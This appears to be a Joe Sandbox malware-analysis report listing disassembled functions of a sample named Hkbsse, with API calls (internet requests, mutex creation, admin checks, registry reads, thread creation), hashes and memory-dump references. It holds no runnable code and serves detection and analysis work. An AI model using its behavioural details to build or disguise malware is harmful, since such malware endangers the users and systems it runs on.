Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situConnectHttpMtx_destroy_in_situRequestSleep
String ID: Mc0k6MOc$SF==$SvR+
API String ID: 865245202-1268499123
Opcode ID: 84c6e155706853fbf64ecdb425b83cacb2b82a4e074f1c2ad1c81272d43dfdc1
Instruction ID: e67fa2d567b9b43439dc73eb0b6e443aa7d5112e1215c143d0deee74d1d157bd
Opcode Fuzzy Hash: 84c6e155706853fbf64ecdb425b83cacb2b82a4e074f1c2ad1c81272d43dfdc1
Instruction Fuzzy Hash: 30D12A71A102488BEF08DB78CD8979D7BB2AF92304F2481ECE4159B3D6D779DA84CB51

Function 00B9A870 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationsleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutexObjectSingleSleepWait
String ID:
API String ID: 69417588-0
Opcode ID: 4c275323aade0a72a2a3f06e6444c6e3fc16cfa6fea9c2748bb61723196f13c2
Instruction ID: bd009abe24402c80f5d4850e388705e282402102b186ed5d6396397661fecc51
Opcode Fuzzy Hash: 4c275323aade0a72a2a3f06e6444c6e3fc16cfa6fea9c2748bb61723196f13c2
Instruction Fuzzy Hash: 7BE0EC70254248DBE2407B74AC8EF1836A5E741B02F500424F609DB4E1CFA05A818B61

Function 00B9D5B0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00B9D7F3
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?), ref: 00B9D90F

Strings

/!8, xrefs: 00B9D5DB

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFileModuleName
String ID: /!8
API String ID: 3341437400-2196672732
Opcode ID: 5a561dd07b1f9bcca7487f3b3c4432b3a61ba9ef40b5dc5dd9d9322cf223cced
Instruction ID: 57915b24c1a6d638e670b00cfc4a77a05feffd9966faffb3b3f0e3900dac1b36
Opcode Fuzzy Hash: 5a561dd07b1f9bcca7487f3b3c4432b3a61ba9ef40b5dc5dd9d9322cf223cced
Instruction Fuzzy Hash: FCD110319042589BEF25EB28CC897DDBBF1AB56304F1042E8E449A7282DB755FC4CF91

Function 00BC6F51 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00BC6E88,?,?,00000000,00000000), ref: 00BC6F7F
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00BC6E88,?,?,00000000,00000000), ref: 00BC6F93

Strings

/!8, xrefs: 00BC6F59

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Time$System$FileLocalSpecific
String ID: /!8
API String ID: 1707611234-2196672732
Opcode ID: efb406e157a23d3577308ecaeed82fc00375d9bc83d7a69b8a1b2fe2c09f945d
Instruction ID: de83a07740d179ecb50686fb4a96b329525a39e365900966a4d6694901936e03
Opcode Fuzzy Hash: efb406e157a23d3577308ecaeed82fc00375d9bc83d7a69b8a1b2fe2c09f945d
Instruction Fuzzy Hash: F711DAB290010DABDB10DF95D984FDFB7FCAB08310F5042AAE516E7190EB34EA48CB61

Function 00BCAEEB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,38EB212F,?), ref: 00BCAF1D

Strings

/!8, xrefs: 00BCAEED

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: /!8
API String ID: 1279760036-2196672732
Opcode ID: 88a9f75a6002957cfdbecaf905fcbe071e3a61cfb3c4747cca37d2e653fd3dfd
Instruction ID: a5d8c7ef4b4dd74c9eba42174735848b187c853f47665d19f15d03cfc5d559fd
Opcode Fuzzy Hash: 88a9f75a6002957cfdbecaf905fcbe071e3a61cfb3c4747cca37d2e653fd3dfd
Instruction Fuzzy Hash: B7E0E5B11052295AD72037616C45F5B3AD8DF413B6F1001ACAD41E7190CE70CC0085E2

Function 00BC6C79 Relevance: 3.1, APIs: 2, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f2c24c1b9cdb15f605aa5d7cd256146bf586d192c4e99016727a0273565ac71
Instruction ID: a2d20e21871589211f058187ec65a757661b7ae1fd8a603e2a2da57e8704c598
Opcode Fuzzy Hash: 6f2c24c1b9cdb15f605aa5d7cd256146bf586d192c4e99016727a0273565ac71
Instruction Fuzzy Hash: 0D210A72A441087BEB117B64AC42F9F37B9DF41339F2003A8F9256B1D1DF709E0596A1

Function 00BA6AB0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00BA6B35

Strings

/!8, xrefs: 00BA46A4, 00BA6AC6

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: /!8
API String ID: 3472027048-2196672732
Opcode ID: e23dfcbe7671d357291c2774b0750e4478613b82f6c89a51c948c24df6c5e619
Instruction ID: 20c8bcce89ee24366d6441120c162dc66c4bb72f5d0f67692506ee9ef656c554
Opcode Fuzzy Hash: e23dfcbe7671d357291c2774b0750e4478613b82f6c89a51c948c24df6c5e619
Instruction Fuzzy Hash: 98F08671A44514A7C711BB798D0771EBBE4A703B20F9002D9E811672E2DF741A1487D2

Function 00BA6B70 Relevance: 3.0, APIs: 2, Instructions: 23sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A870: Sleep.KERNEL32(000003E8), ref: 00B9A875
Part of subcall function 00B9A870: CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
Part of subcall function 00B9A870: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
Part of subcall function 00B9A870: GetLastError.KERNEL32 ref: 00B9A8A2

Part of subcall function 00BA4EA0: IsUserAnAdmin.SHELL32 ref: 00BA4FF7

Part of subcall function 00B95DD0: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 00B9606D

CreateThread.KERNEL32(00000000,00000000,Function_00016AB0,00000000,00000000,00000000), ref: 00BA6B50
Sleep.KERNEL32(00007530), ref: 00BA6B65

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CreateSleep$AdminErrorLastMutexObjectOpenSingleThreadUserWait
String ID:
API String ID: 2472289255-0
Opcode ID: e93dc5ced237a73edd7fbdbd824be41b4e9f034725e36d7b5f5e4033af8057f6
Instruction ID: 53661cb87b673eeeaf43e58fb5c344813e05a051f176393f96a7f59b4d5be3c7
Opcode Fuzzy Hash: e93dc5ced237a73edd7fbdbd824be41b4e9f034725e36d7b5f5e4033af8057f6
Instruction Fuzzy Hash: 9AE0867569C30467E62037A15C47F197AD45B02B21F6441F0B7156E0E29EE0340042FF

Function 00B99AB5 Relevance: 1.6, APIs: 1, Instructions: 114synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B99AB8
Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID:
API String ID: 3807984492-0
Opcode ID: 579ccd0bf13e081c324b3e163d809acd3eabdbad8abe7119c3e8b5318d1f40a4
Instruction ID: a1cdacf957fe26cd5120d086e22a9c80b2423c79cad52825e28d4833de3b3eef
Opcode Fuzzy Hash: 579ccd0bf13e081c324b3e163d809acd3eabdbad8abe7119c3e8b5318d1f40a4
Instruction Fuzzy Hash: 46313571A041448BEF08DB7CDCC97ADBBF2EB86324F2482ACE0119B3D6D77959808750

Function 00B99BEA Relevance: 1.6, APIs: 1, Instructions: 113synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B99BED
Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID:
API String ID: 3807984492-0
Opcode ID: 273ab3057872741f7c7880c48b831f2943e5d4a63386c9351e54418c64b38c74
Instruction ID: b377344c287465ccb85b77d73ddbe6ce240c27bf2f3234705ecc147d04ee04bf
Opcode Fuzzy Hash: 273ab3057872741f7c7880c48b831f2943e5d4a63386c9351e54418c64b38c74
Instruction Fuzzy Hash: B2312471A141448BEF08DB6CCCC979CBBF2EB96314F2482ACE011A73D9D77999808750

Function 00B99E54 Relevance: 1.6, APIs: 1, Instructions: 111synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B99E57
Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID:
API String ID: 3807984492-0
Opcode ID: 1b1ef365fb04d3b2911e9047861fecf44aa96d0fb1dd2cca4c740c09aea466b2
Instruction ID: d476e8e1c95c6a46642b5852c87985278f0c452b44c3a196b9797fbdcd44c708
Opcode Fuzzy Hash: 1b1ef365fb04d3b2911e9047861fecf44aa96d0fb1dd2cca4c740c09aea466b2
Instruction Fuzzy Hash: A0313571A141448BEF08DB7CCD8979CBBF2AB85314F2482ACF011E77D5C77A99848750

Function 00B99F89 Relevance: 1.6, APIs: 1, Instructions: 110synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B99F8C
Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID:
API String ID: 3807984492-0
Opcode ID: d5ce0a169f2640a9a16a620d72721ca637bda3617b6b84401c1daef1ff55a9f1
Instruction ID: 83c9ff819cfa68da4e809b2a2d15fe6ff5766b37db942b7d78cb576a73654490
Opcode Fuzzy Hash: d5ce0a169f2640a9a16a620d72721ca637bda3617b6b84401c1daef1ff55a9f1
Instruction Fuzzy Hash: 8831E571A141448BEF18CB78CD897ADBBF2EB85314F2483ACE011DB7D6D77AA9808751

Function 00B9A0BE Relevance: 1.6, APIs: 1, Instructions: 109synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B9A0C1
Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID:
API String ID: 3807984492-0
Opcode ID: 8e7166284a9271d57b106028c61aed629f17df2cb176a844865141f3c6b43c0e
Instruction ID: 627b7af439dda80134a1ef1bbacad84966c861ef1797c3b869872425cb9811f9
Opcode Fuzzy Hash: 8e7166284a9271d57b106028c61aed629f17df2cb176a844865141f3c6b43c0e
Instruction Fuzzy Hash: C831E571A141448BEF0CCB78DD8979CBBF2AB86314F2482A8E015EB7D6D77959808792

Function 00B9A1F3 Relevance: 1.6, APIs: 1, Instructions: 108synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B9A1F6
Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID:
API String ID: 3807984492-0
Opcode ID: f69b0c7868686f9b05d4e309e6909eac4b6bdba3dd3f2ac8d9474d1905dd2b86
Instruction ID: a88d8751a3950d563db2dec38d6fb33e2f70883324959f14c35b412eaef9fa4a
Opcode Fuzzy Hash: f69b0c7868686f9b05d4e309e6909eac4b6bdba3dd3f2ac8d9474d1905dd2b86
Instruction Fuzzy Hash: F8310871A041449BDF08CB78CDC979CFBF2EB96314F2483A8E011AB7D5D77A99818791

Function 00B9A328 Relevance: 1.6, APIs: 1, Instructions: 107synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B9A32B
Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID:
API String ID: 3807984492-0
Opcode ID: b588362e784d4f0a06332631e79bc25621711353a382f90513f84b9d5d7557f4
Instruction ID: 21df11b926500bccec012bde53a33689d0c93c5af535cc75a85c2eea9110e4da
Opcode Fuzzy Hash: b588362e784d4f0a06332631e79bc25621711353a382f90513f84b9d5d7557f4
Instruction Fuzzy Hash: E631F8716041448BDF08DB78DD8975CBBF2EF85314F2482ACE051E73D6D77559808B92

Function 00B9A45D Relevance: 1.6, APIs: 1, Instructions: 106synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B9A460
Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID:
API String ID: 3807984492-0
Opcode ID: 80ca06086de1626a3efb6df8f5a8dbbe090512c948685a9230448e015f420ebe
Instruction ID: 0062117768f7ee099ba27bff6ff2cdd4bfbac34261ca9080902e3f4bf9283653
Opcode Fuzzy Hash: 80ca06086de1626a3efb6df8f5a8dbbe090512c948685a9230448e015f420ebe
Instruction Fuzzy Hash: 893126316041448BEF08DB78CD89B5CBBF2AF85314F2482ACE051D77D6D77999818792

Function 00B9A592 Relevance: 1.6, APIs: 1, Instructions: 105synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B9A595
Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
